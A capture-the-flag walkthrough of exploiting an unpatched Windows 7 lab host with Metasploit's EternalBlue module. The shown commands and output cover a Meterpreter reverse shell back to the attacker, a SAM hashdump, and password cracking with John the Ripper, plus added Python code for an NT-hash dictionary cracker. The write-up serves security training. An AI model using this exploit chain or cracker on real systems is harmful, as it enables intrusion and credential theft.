Wednesday, December 22, 2021

Hacking Windows using Eternalblue - [THM] Walk-through

In April 2017 the EternalBlue exploit was leaked to the public by a group known as the Shadow Brokers, who claimed it had been developed and weaponized by the National Security Agency (NSA). EternalBlue is the name of the exploit; the flaw it abuses is a remote code execution vulnerability in the SMBv1 implementation of Microsoft's Server Message Block (SMB) protocol in Windows, tracked as CVE-2017-0144 and fixed by Microsoft in security bulletin MS17-010 on March 14, 2017, about a month before the leak. Hosts that never took the patch and still expose SMBv1 remain exploitable, which the WannaCry outbreak of May 2017 demonstrated at scale.

This walk-through demonstrates how the Metasploit EternalBlue module can be used against an unpatched Windows 7 target. Because the bug is in the kernel-mode SMB driver, a successful run gives remote code execution as NT AUTHORITY\SYSTEM in a single step; no separate privilege escalation is needed. From there we migrate to a stable process, dump the local password hashes, crack one of them, and locate the room's flags.

Enumerate the target 

We begin by enumerating our target using RustScan. RustScan is an open-source port scanner written in Rust that sweeps all ports quickly and then hands only the open ones to Nmap, so the slow service and script scan runs against a handful of ports instead of 65,535 (its README advertises turning a 17-minute Nmap scan into about a minute). The target is given with -a/--addresses, and everything after the -- separator is passed to Nmap unchanged. Here we pass --script vuln, which runs every NSE script in Nmap's "vuln" category. Note that the first attempt below fails because the address was passed without the -a flag; the second attempt, with -a and the separator, runs.

root@kali:~# rustscan --script vuln 10.10.22.224
error: The argument '--addresses <addresses>' requires a value but none was supplied

USAGE:
    rustscan --addresses <addresses>... --batch-size <batch-size> --scan-order <scan-order> --scripts <scripts> --timeout <timeout> --tries <tries>

For more information try --help

root@kali:~# rustscan -a 10.10.22.244 -- --script vuln
The Modern Day Port Scanner.
https://discord.gg/GFrQsGy
https://github.com/RustScan/RustScan

PORT      STATE SERVICE       REASON
135/tcp   open  msrpc         syn-ack ttl 125
139/tcp   open  netbios-ssn   syn-ack ttl 125
445/tcp   open  microsoft-ds  syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125
| sslv2-drown:
|_
49152/tcp open  unknown       syn-ack ttl 125
49153/tcp open  unknown       syn-ack ttl 125
49154/tcp open  unknown       syn-ack ttl 125
49158/tcp open  unknown       syn-ack ttl 125
49160/tcp open  unknown       syn-ack ttl 125

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

We can see from the output that the target is listening on ports 139 (NetBIOS session service) and 445 (SMB directly over TCP), so SMB is exposed, and 3389 (RDP) is open as well. The smb-vuln-ms17-010 script confirms the host is vulnerable to the MS17-010 SMBv1 remote code execution bug (reported by Nmap under CVE-2017-0143, one of the six CVEs the bulletin covers). The other SMB scripts did not find anything, but note the difference between "false" (the check ran and the host is not affected) and "NT_STATUS_ACCESS_DENIED" (the check could not complete because it needed credentials); only the former is evidence of safety.
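To show how a practitioner turns scan output like the above into a yes/no decision, here is an added example of my own; it is not code from the original walk-through, RustScan or Nmap. It parses Nmap's normal output for the port table and the NSE host-script results and reports only the scripts that actually returned "State: VULNERABLE", ignoring scripts that errored out with NT_STATUS_ACCESS_DENIED or returned false. The embedded scan text is a constructed, trimmed copy of the output shown above, not a live scan result.

```python
import re

# Constructed sample: a trimmed copy of the Nmap "vuln" output shown in the
# walk-through. It is embedded so the example runs offline.
SAMPLE_NMAP_OUTPUT = """\
PORT      STATE SERVICE       REASON
135/tcp   open  msrpc         syn-ack ttl 125
139/tcp   open  netbios-ssn   syn-ack ttl 125
445/tcp   open  microsoft-ds  syn-ack ttl 125
3389/tcp  open  ms-wbt-server syn-ack ttl 125
| sslv2-drown:
|_
49152/tcp open  unknown       syn-ack ttl 125
49153/tcp open  unknown       syn-ack ttl 125
49154/tcp open  unknown       syn-ack ttl 125
49158/tcp open  unknown       syn-ack ttl 125
49160/tcp open  unknown       syn-ack ttl 125

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|       servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# First line of an NSE script block: "|_name: ..." or "| name:". Continuation
# lines are indented by several spaces, so they do not match.
SCRIPT_RE = re.compile(r"^\|[ _]([\w-]+):")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_ports(text):
    """Return {port: (state, service)} for every port line in the output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4))
    return ports


def parse_host_scripts(text):
    """Group the 'Host script results' section by script name -> body lines."""
    scripts, current, in_host = {}, None, False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_host = True
            continue
        if not in_host or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [line[len(m.group(0)):].strip()]
        elif current:
            scripts[current].append(line.lstrip("|_ ").rstrip())
    return scripts


def vulnerable_findings(text):
    """{script: [CVE ids]} for scripts whose body says 'State: VULNERABLE'.

    A script that printed NT_STATUS_ACCESS_DENIED or 'false' is not a finding,
    even though Nmap lists it in the same section."""
    findings = {}
    for name, body in parse_host_scripts(text).items():
        joined = "\n".join(body)
        if re.search(r"^State:\s*VULNERABLE", joined, re.M):
            findings[name] = sorted(set(CVE_RE.findall(joined)))
    return findings


def smb_exposed(ports):
    """SMB is reachable when 445/tcp (direct) or 139/tcp (NetBIOS session) is open."""
    return any(ports.get(p, ("", ""))[0] == "open" for p in (445, 139))


def triage(text):
    """One-call summary a scanner wrapper could act on."""
    ports = parse_ports(text)
    return {
        "open_ports": sorted(p for p, (state, _) in ports.items() if state == "open"),
        "smb_exposed": smb_exposed(ports),
        "vulnerable": vulnerable_findings(text),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_NMAP_OUTPUT)
    print("open ports :", summary["open_ports"])
    print("SMB exposed:", summary["smb_exposed"])
    for script, cves in summary["vulnerable"].items():
        print(f"{script}: VULNERABLE ({', '.join(cves)})")
```

The regexes are tuned for the human-readable format, which Nmap does not promise to keep stable; for anything beyond a one-host walk-through, scan with -oX and parse the XML instead. The point that carries over either way is the distinction drawn in the prose above: only "State: VULNERABLE" is a finding, and an access-denied result is an incomplete check, not a clean bill of health.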

Armed with this knowledge we can now move on to the...

Exploitation Phase

To start the exploitation phase we fire up the Metasploit Framework (MSF) on our Kali attack box with msfconsole and search the module database for "eternal".

Nmap done: 1 IP address (1 host up) scanned in 132.82 seconds

root@kali:~# msfconsole

       =[ metasploit v6.1.2-dev                          ]
+ -- --=[ 2159 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 594 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Enable HTTP request and response logging
with set HttpTrace true

Starting persistent handler(s)...
msf6 >

msf6 > search eternal

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 >

The search returns five modules. Index 0, exploit/windows/smb/ms17_010_eternalblue, is the SMB Remote Windows Kernel Pool Corruption exploit, and that is the one we will use. Its rank is only "average" for a reason: it corrupts kernel non-paged pool memory and can blue-screen the target if the groom fails, so run it only against hosts you are allowed to crash. "Check: Yes" means the module can test the target before exploiting it. After use 0 we run show options to see what has to be configured: the remote host (RHOSTS, the victim) and the listener address for the reverse shell (LHOST, the attacker). Metasploit pre-fills LHOST with the address of its default interface, 192.168.73.129 here, which is not an address the victim can reach.

msf6 > use 0
No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.73.129   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(windows/smb/ms17_010_eternalblue) >

Our victim's IP address (RHOSTS) is 10.10.22.244. For LHOST we need our own address as seen from the victim. The pre-filled 192.168.73.129 belongs to eth0, the Kali VM's local network, which the TryHackMe machine cannot route to; the reverse shell has to come back over the VPN tunnel, so we look up the address of tun0 with ip a.

root@kali:~# ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether ... brd ...
    inet 192.168.73.129/24 brd 192.168.73.255 scope global dynamic noprefixroute eth0
       valid_lft 1511sec preferred_lft 1511sec
    inet6 fe80::.../64 scope link noprefixroute
       valid_lft forever preferred_lft forever
3: tun0: mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
    link/none
    inet 10.13.24.52/17 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::.../64 scope link stable-privacy
       valid_lft forever preferred_lft forever

Next we configure and launch the exploit in MSF. LHOST is set to the tun0 address 10.13.24.52 and LPORT stays at its default of 4444. The first run below mistypes the target as 10.10.22.224 and the connection times out; the check module then prints "The target is not vulnerable", but that verdict only means the check could not talk to a host at all. A "not vulnerable" result is only meaningful when the connection succeeded, so always read the lines above it before trusting it. Correcting RHOSTS to 10.10.22.244 fixes it.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.13.24.52
lhost => 10.13.24.52
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.22.224
rhost => 10.10.22.224
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Started reverse TCP handler on 10.13.24.52:4444
10.10.22.224:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
10.10.22.224:445 - Rex::ConnectionTimeout: The connection with (10.10.22.224:445) timed out.
10.10.22.224:445 - Scanned 1 of 1 hosts (100% complete)
10.10.22.224:445 - The target is not vulnerable.
Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.22.244
rhost => 10.10.22.244
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Started reverse TCP handler on 10.13.24.52:4444

The exploit runs and... winner winner chicken dinner! The exploit was successful and we have a reverse TCP Meterpreter session as NT AUTHORITY\SYSTEM. The output also shows what the module is doing: the check fingerprints the OS from the SMB reply (Windows 7 Professional 7601 Service Pack 1, x64) and confirms the architecture over DCE/RPC, then the exploit grooms the kernel's non-paged pool with SMBv2 buffers, closes the SMBv1 connection to leave a free hole next to them, sends the last fragment of the malformed packet to trigger the overwrite, and finally sends the "egg" (the payload) over the corrupted connection. Note that whoami is a Windows command, not a Meterpreter one; getuid is the Meterpreter equivalent.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.22.244
rhost => 10.10.22.244
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Started reverse TCP handler on 10.13.24.52:4444
10.10.22.244:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
10.10.22.244:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
10.10.22.244:445 - Scanned 1 of 1 hosts (100% complete)
10.10.22.244:445 - The target is vulnerable.
10.10.22.244:445 - Connecting to target for exploitation.
10.10.22.244:445 - Connection established for exploitation.
10.10.22.244:445 - Target OS selected valid for OS indicated by SMB reply
10.10.22.244:445 - CORE raw buffer dump (42 bytes)
10.10.22.244:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
10.10.22.244:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
10.10.22.244:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
10.10.22.244:445 - Target arch selected valid for arch indicated by DCE/RPC reply
10.10.22.244:445 - Trying exploit with 12 Groom Allocations.
10.10.22.244:445 - Sending all but last fragment of exploit packet
10.10.22.244:445 - Starting non-paged pool grooming
10.10.22.244:445 - Sending SMBv2 buffers
10.10.22.244:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
10.10.22.244:445 - Sending final SMBv2 buffers.
10.10.22.244:445 - Sending last fragment of exploit packet!
10.10.22.244:445 - Receiving response from exploit packet
10.10.22.244:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
10.10.22.244:445 - Sending egg to corrupted connection.
10.10.22.244:445 - Triggering free of corrupted buffer.
Sending stage (200262 bytes) to 10.10.22.244
Meterpreter session 1 opened (10.13.24.52:4444 -> 10.10.22.244:49169) at 2021-12-22 ... -0500
10.10.22.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

meterpreter > whoami
Unknown command: whoami
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Although we landed in a Meterpreter session, we can use the shell command to open a Windows command prompt and run whoami there to confirm again that we are NT AUTHORITY\SYSTEM. Ctrl-Z sends the shell channel to the background and returns us to the Meterpreter prompt, where we next list processes with ps.

meterpreter > shell
Process 2676 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>^Z
Background channel 1? [y/N]
meterpreter > ps

Privilege Escalation 

getuid reports the token of the process Meterpreter is running in, so we already are SYSTEM. The problem is stability: the process we landed in was hijacked by a kernel exploit and may die or be cleaned up, taking the session with it. So we look through the ps output for a long-lived process that runs as NT AUTHORITY\SYSTEM and migrate into it; winlogon.exe (PID 608 here) is the usual choice. The first migrate attempt fails because PID 1288 is the process we are already in; migrate -N winlogon.exe migrates by process name instead. Once we are sitting in a stable SYSTEM process we run hashdump, which reads the local SAM and dumps every account's hashes in pwdump format (user:RID:LM hash:NT hash:::). Two details in the output are worth reading: the LM field aad3b435b51404eeaad3b435b51404ee for every account is the "empty" LM hash, meaning LM hashes are not stored (the default since Vista), and the NT value 31d6cfe0d16ae931b73c59d7e0c089c0 for Administrator and Guest is the hash of an empty password, so the only account with a real password to crack is the non-default user Jon.

meterpreter > migrate 1288
Process already running at PID 1288
meterpreter > migrate -N winlogon.exe
Migrating from 1288 to 608...
Migration completed successfully.
meterpreter > hasdump
Unknown command: hasdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

Once we have the NT hash for "Jon" there are a couple of ways to crack it. The first is CrackStation, a website that looks the hash up in precomputed tables of common passwords. That is fine for a lab box, but never paste hashes from a real engagement into a third-party site: you are handing a client's credential material to someone else's server.

 

Another way is a tool local to our Kali box: John the Ripper, run with --format=NT (NT hashes are unsalted MD4 over the UTF-16LE password, so a wordlist attack is fast) against the rockyou.txt wordlist. The first attempt fails only because the wordlist was not where I expected it; on Kali it lives under /usr/share/wordlists/.

root@kali:~/Desktop/THM/blue# john jon.hash --format=NT --wordlist=/opt/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 XOP 4x2])
Warning: no OpenMP support for this hash type, consider --fork=4
fopen: /opt/rockyou.txt: No such file or directory
root@kali:~/Desktop/THM/blue# locate rockyou.txt
/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz
/usr/share/wordlists/rockyou.txt
root@kali:~/Desktop/THM/blue# john jon.hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 XOP 4x2])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (Jon)
1g ... DONE (2021-12-22 11:08) 0.9009g/s 9189Kp/s 9189Kc/s 9189KC/s alqmzp12..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/THM/blue# john jon.hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --show
Invalid options combination or duplicate option: "--show"
root@kali:~/Desktop/THM/blue# john jon.hash --format=NT --show
Jon:alqfna22:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

1 password hash cracked, 0 left
root@kali:~/Desktop/THM/blue#
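Both the hashdump output and John's result above can be reasoned about with a few lines of code. What follows is an added example of my own; it is not code from the walk-through, Metasploit or John the Ripper. It parses pwdump-format lines, flags the two things worth noticing in that dump (the LM field aad3b435b51404eeaad3b435b51404ee means LM hashing is disabled, and the NT value 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password), and then performs the same attack John ran: an NT hash is unsalted MD4 over the UTF-16LE encoding of the password, so each candidate is hashed once and compared against every account at the same time. MD4 is implemented inline because Python builds on OpenSSL 3 no longer expose it through hashlib. The three hashdump lines and the five-word wordlist are constructed sample input standing in for the real dump and rockyou.txt.

```python
import struct

# Constructed sample: the three hashdump lines from the walk-through, in
# pwdump format (user:RID:LM hash:NT hash:::). Not output from a live session.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

# Constructed mini wordlist standing in for rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "letmein", "alqfna22", "Winter2021"]

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of "": blank password
MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_block(state, block):
    """One MD4 compression (RFC 1320) over a 64-byte block."""
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    rounds = (
        # (step function, additive constant, shift schedule, message word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for fn, k, shifts, order in rounds:
        for i, idx in enumerate(order):
            a = _rotl((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4])
            a, b, c, d = d, a, b, c  # rotate the working variables a->b->c->d
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]


def md4(data):
    """MD4 digest of a byte string (Merkle-Damgard padding, little-endian)."""
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        state = _md4_block(state, data[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NT hash: MD4 over the UTF-16LE password. No salt, so equal passwords collide."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text):
    """Turn pwdump lines into records, annotating the two telltale values."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        records.append({
            "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM,      # no LM hash stored
            "blank_password": nt.lower() == EMPTY_NT,   # NT hash of ""
        })
    return records


def crack(records, wordlist):
    """Dictionary attack as john --format=NT does it: hash each candidate once,
    look it up against every outstanding account. Returns {user: password}."""
    wanted = {}
    for r in records:
        if not r["blank_password"]:
            wanted.setdefault(r["nt"], []).append(r["user"])
    found = {r["user"]: "" for r in records if r["blank_password"]}
    for candidate in wordlist:
        users = wanted.pop(nt_hash(candidate), None)
        if users:
            for user in users:
                found[user] = candidate
        if not wanted:
            break
    return found


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE_HASHDUMP)
    for r in recs:
        print(f"{r['user']:14} LM disabled={r['lm_disabled']} blank={r['blank_password']}")
    print(crack(recs, SAMPLE_WORDLIST))
```

Because the NT hash has no salt, the candidate is hashed once per word regardless of how many accounts are in the dump, which is why John reports millions of candidates per second even on a single core. Administrator and Guest come back with an empty password; both accounts are disabled by default on Windows 7, and hashdump does not show account status, so a blank NT hash is a lead to verify rather than a login on its own.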

Now that we have cracked the password it is time to capture the flags. Each flag in this room comes with a clue to its location. The clue for the first flag is that it can be found at the system root, so we change to C:\ in Meterpreter and list it.

meterpreter > pwd
C:\
meterpreter > ls
Listing: C:\
============

Type  Name
----  ----
dir   $Recycle.Bin
dir   Documents and Settings
dir   PerfLogs
dir   Program Files
dir   Program Files (x86)
dir   ProgramData
dir   Recovery
dir   System Volume Information
dir   Users
dir   Windows
fil   flag1.txt        (24 bytes, modified 2018-12-12)
fif   pagefile.sys

Flag 2? This flag can be found at the location where Windows stores local account passwords: the SAM and SYSTEM registry hives under C:\Windows\System32\config, the same data hashdump read a moment ago.

meterpreter > ls
Listing: C:\Windows\System32\config
===================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  524288  fil   2019-03-17 18:21:15 -0400  SYSTEM{016888cd-6c6f-11de-8d1d-001e0bcde3ec}.TMcontainer00000000000000000002.regtrans-ms
100666/rw-rw-rw-  34      fil   2018-12-12 ...      -0500  flag2.txt

meterpreter > pwd
C:\Windows\System32\config
meterpreter >

Flag 3? This flag can be found in an excellent location to loot. After all, administrators (our "Jon" account is a local admin) usually have interesting things saved in their profile, so we go to C:\Users\Jon\Documents.

meterpreter > cd Documents
meterpreter > ls
Listing: C:\Users\Jon\Documents
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx         dir   2018-12-12 22:13:31 -0500  My Music
40777/rwxrwxrwx         dir   2018-12-12 22:13:31 -0500  My Pictures
40777/rwxrwxrwx         dir   2018-12-12 22:13:31 -0500  My Videos
100666/rw-rw-rw-  37    fil   2018-12-12 22:...   -0500  flag3.txt

meterpreter > pwd
C:\Users\Jon\Documents
meterpreter >


Finally, an easier way to find the flags from the Windows command line is to change to the root of the drive and search recursively: cd \ followed by dir /s *flag* lists the location of every file with "flag" in its name.


I appreciate you taking the time to read through and comment on this walk-through. I have taken you all the way to the point of locating the flags. I will leave it up to you to figure out the last step: how to read them. #tryharder ;-) Thanks again, and until next time... Happy Hunting!





